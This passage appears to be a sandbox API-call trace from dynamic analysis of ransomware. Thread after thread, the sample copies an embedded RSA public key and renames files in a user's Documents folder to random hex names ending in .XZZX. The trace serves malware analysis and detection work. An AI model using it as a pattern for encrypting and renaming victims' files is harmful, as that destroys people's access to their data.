LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0102.561] lstrcpyW (in: lpString1=0x420f460, lpString2="4CA2A3B835A9C9D86061764339F6AE20.XZZX" | out: lpString1="4CA2A3B835A9C9D86061764339F6AE20.XZZX") returned="4CA2A3B835A9C9D86061764339F6AE20.XZZX" [0102.562] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0102.562] SetErrorMode (uMode=0x1) returned 0x1 [0102.562] lstrcpyW (in: lpString1=0x420f860, lpString2="4CA2A3B835A9C9D86061764339F6AE20.XZZX" | out: lpString1="4CA2A3B835A9C9D86061764339F6AE20.XZZX") returned="4CA2A3B835A9C9D86061764339F6AE20.XZZX" [0102.562] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x7e3e63aa, Data2=0x17b4, Data3=0x440c, Data4=([0]=0x96, [1]=0xd6, [2]=0x1d, [3]=0x4f, [4]=0xab, [5]=0xd4, [6]=0xe3, [7]=0x59))) returned 0x0 [0102.562] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4CA2A3B835A9C9D86061764339F6AE20.XZZX") returned 81 [0102.562] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0102.562] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5ED25988064CEC707E3E63AA0A6DD0B8.XZZX") returned 81 [0102.562] StrStrW (lpFirst="4CA2A3B835A9C9D86061764339F6AE20.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 280 os_tid = 0x548 [0102.717] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0102.717] lstrcpyW (in: lpString1=0x420f460, lpString2="5A5E8816436ABA61C7EC8F1A47A79EA9.XZZX" | out: lpString1="5A5E8816436ABA61C7EC8F1A47A79EA9.XZZX") returned="5A5E8816436ABA61C7EC8F1A47A79EA9.XZZX" [0102.717] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0102.717] SetErrorMode (uMode=0x1) returned 0x1 [0102.717] lstrcpyW (in: lpString1=0x420f860, lpString2="5A5E8816436ABA61C7EC8F1A47A79EA9.XZZX" | out: lpString1="5A5E8816436ABA61C7EC8F1A47A79EA9.XZZX") returned="5A5E8816436ABA61C7EC8F1A47A79EA9.XZZX" [0102.717] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0xb9cb1b0b, Data2=0xa030, Data3=0x4739, Data4=([0]=0xa6, [1]=0xff, [2]=0xb2, [3]=0x2d, [4]=0x96, [5]=0x6d, [6]=0xe9, [7]=0xa7))) returned 0x0 [0102.717] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5A5E8816436ABA61C7EC8F1A47A79EA9.XZZX") returned 81 [0102.717] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0102.717] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\C6FBF2102C90FAB0B9CB1B0B30B1DEF8.XZZX") returned 81 [0102.717] StrStrW (lpFirst="5A5E8816436ABA61C7EC8F1A47A79EA9.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 281 os_tid = 0x544 [0102.873] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0102.873] lstrcpyW (in: lpString1=0x420f460, lpString2="5F3F59042CD153CCC290441930FE3814.XZZX" | out: lpString1="5F3F59042CD153CCC290441930FE3814.XZZX") returned="5F3F59042CD153CCC290441930FE3814.XZZX" [0102.873] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0102.873] SetErrorMode (uMode=0x1) returned 0x1 [0102.873] lstrcpyW (in: lpString1=0x420f860, lpString2="5F3F59042CD153CCC290441930FE3814.XZZX" | out: lpString1="5F3F59042CD153CCC290441930FE3814.XZZX") returned="5F3F59042CD153CCC290441930FE3814.XZZX" [0102.873] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0xd7db408, Data2=0x4215, Data3=0x4a4f, Data4=([0]=0xbb, [1]=0xbd, [2]=0x87, [3]=0x9b, [4]=0x1b, [5]=0x73, [6]=0xf4, [7]=0x4f))) returned 0x0 [0102.873] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5F3F59042CD153CCC290441930FE3814.XZZX") returned 81 [0102.873] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0102.873] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\83B9D4A8132E767B0D7DB408174F5AC3.XZZX") returned 81 [0102.873] StrStrW (lpFirst="5F3F59042CD153CCC290441930FE3814.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 282 os_tid = 0x540 [0103.029] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0103.029] lstrcpyW (in: lpString1=0x420f460, lpString2="7E0556C23257A27A640F901F368486C2.XZZX" | out: lpString1="7E0556C23257A27A640F901F368486C2.XZZX") returned="7E0556C23257A27A640F901F368486C2.XZZX" [0103.029] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0103.029] SetErrorMode (uMode=0x1) returned 0x1 [0103.029] lstrcpyW (in: lpString1=0x420f860, lpString2="7E0556C23257A27A640F901F368486C2.XZZX" | out: lpString1="7E0556C23257A27A640F901F368486C2.XZZX") returned="7E0556C23257A27A640F901F368486C2.XZZX" [0103.029] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0xe06fca06, Data2=0x5eaf, Data3=0x4fa0, Data4=([0]=0x8a, [1]=0x17, [2]=0xb7, [3]=0xa8, [4]=0x7, [5]=0x9c, [6]=0xd4, [7]=0x93))) returned 0x0 [0103.029] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\7E0556C23257A27A640F901F368486C2.XZZX") returned 81 [0103.029] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0103.029] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\78994E1A1D732E60E06FCA06219412A8.XZZX") returned 81 [0103.029] StrStrW (lpFirst="7E0556C23257A27A640F901F368486C2.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 283 os_tid = 0x408 [0103.185] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0103.185] lstrcpyW (in: lpString1=0x420f460, lpString2="96E8BC382A82756A96F374BC2E7B59B2.XZZX" | out: lpString1="96E8BC382A82756A96F374BC2E7B59B2.XZZX") returned="96E8BC382A82756A96F374BC2E7B59B2.XZZX" [0103.185] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0103.185] SetErrorMode (uMode=0x1) returned 0x1 [0103.185] lstrcpyW (in: lpString1=0x420f860, lpString2="96E8BC382A82756A96F374BC2E7B59B2.XZZX" | out: lpString1="96E8BC382A82756A96F374BC2E7B59B2.XZZX") returned="96E8BC382A82756A96F374BC2E7B59B2.XZZX" [0103.185] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x27895028, Data2=0xf419, Data3=0x4c29, Data4=([0]=0x9b, [1]=0xd2, [2]=0xb0, [3]=0x96, [4]=0xb0, [5]=0xdc, [6]=0xef, [7]=0xf3))) returned 0x0 [0103.185] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\96E8BC382A82756A96F374BC2E7B59B2.XZZX") returned 81 [0103.185] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0103.185] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\BCCEF3E8489E8401278950284CBF6849.XZZX") returned 81 [0103.185] StrStrW (lpFirst="96E8BC382A82756A96F374BC2E7B59B2.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 284 os_tid = 0x79c [0103.341] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0103.341] lstrcpyW (in: lpString1=0x420f460, lpString2="A9467A821967F20598E66B961D60D64D.XZZX" | out: lpString1="A9467A821967F20598E66B961D60D64D.XZZX") returned="A9467A821967F20598E66B961D60D64D.XZZX" [0103.342] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0103.342] SetErrorMode (uMode=0x1) returned 0x1 [0103.342] lstrcpyW (in: lpString1=0x420f860, lpString2="A9467A821967F20598E66B961D60D64D.XZZX" | out: lpString1="A9467A821967F20598E66B961D60D64D.XZZX") returned="A9467A821967F20598E66B961D60D64D.XZZX" [0103.342] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0xa0c09496, Data2=0x1196, Data3=0x4dcf, Data4=([0]=0xbc, [1]=0xb2, [2]=0x9e, [3]=0xa1, [4]=0xe9, [5]=0xff, [6]=0x5e, [7]=0xe4))) returned 0x0 [0103.342] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\A9467A821967F20598E66B961D60D64D.XZZX") returned 81 [0103.342] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0103.342] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FAB505E40558564AA0C0949609793A92.XZZX") returned 81 [0103.342] StrStrW (lpFirst="A9467A821967F20598E66B961D60D64D.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 285 os_tid = 0x340 [0103.497] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0103.497] lstrcpyW (in: lpString1=0x420f460, lpString2="AF137D37318F929FC9EC733B358876E7.XZZX" | out: lpString1="AF137D37318F929FC9EC733B358876E7.XZZX") returned="AF137D37318F929FC9EC733B358876E7.XZZX" [0103.497] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0103.497] SetErrorMode (uMode=0x1) returned 0x1 [0103.497] lstrcpyW (in: lpString1=0x420f860, lpString2="AF137D37318F929FC9EC733B358876E7.XZZX" | out: lpString1="AF137D37318F929FC9EC733B358876E7.XZZX") returned="AF137D37318F929FC9EC733B358876E7.XZZX" [0103.497] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x349c0d5d, Data2=0x1270, Data3=0x436a, Data4=([0]=0xae, [1]=0x9e, [2]=0x28, [3]=0x8a, [4]=0x92, [5]=0xfc, [6]=0xa0, [7]=0x13))) returned 0x0 [0103.497] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\AF137D37318F929FC9EC733B358876E7.XZZX") returned 81 [0103.497] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0103.497] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FD3662B004DAF260349C0D5D08FBD6A8.XZZX") returned 81 [0103.497] StrStrW (lpFirst="AF137D37318F929FC9EC733B358876E7.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 286 os_tid = 0x7a0 [0103.653] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0103.653] lstrcpyW (in: lpString1=0x420f460, lpString2="B0407B59334CDCAF9E2CA2E33779C0F7.XZZX" | out: lpString1="B0407B59334CDCAF9E2CA2E33779C0F7.XZZX") returned="B0407B59334CDCAF9E2CA2E33779C0F7.XZZX" [0103.653] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0103.653] SetErrorMode (uMode=0x1) returned 0x1 [0103.653] lstrcpyW (in: lpString1=0x420f860, lpString2="B0407B59334CDCAF9E2CA2E33779C0F7.XZZX" | out: lpString1="B0407B59334CDCAF9E2CA2E33779C0F7.XZZX") returned="B0407B59334CDCAF9E2CA2E33779C0F7.XZZX" [0103.653] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x2d5c2680, Data2=0x51dc, Data3=0x400b, Data4=([0]=0xbd, [1]=0xfe, [2]=0x3f, [3]=0x7a, [4]=0x11, [5]=0x78, [6]=0x1d, [7]=0xa1))) returned 0x0 [0103.653] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\B0407B59334CDCAF9E2CA2E33779C0F7.XZZX") returned 81 [0103.653] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0103.656] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\235F9600147A84742D5C2680189B68BC.XZZX") returned 81 [0103.656] StrStrW (lpFirst="B0407B59334CDCAF9E2CA2E33779C0F7.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 287 os_tid = 0x6cc [0103.809] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0103.809] lstrcpyW (in: lpString1=0x420f460, 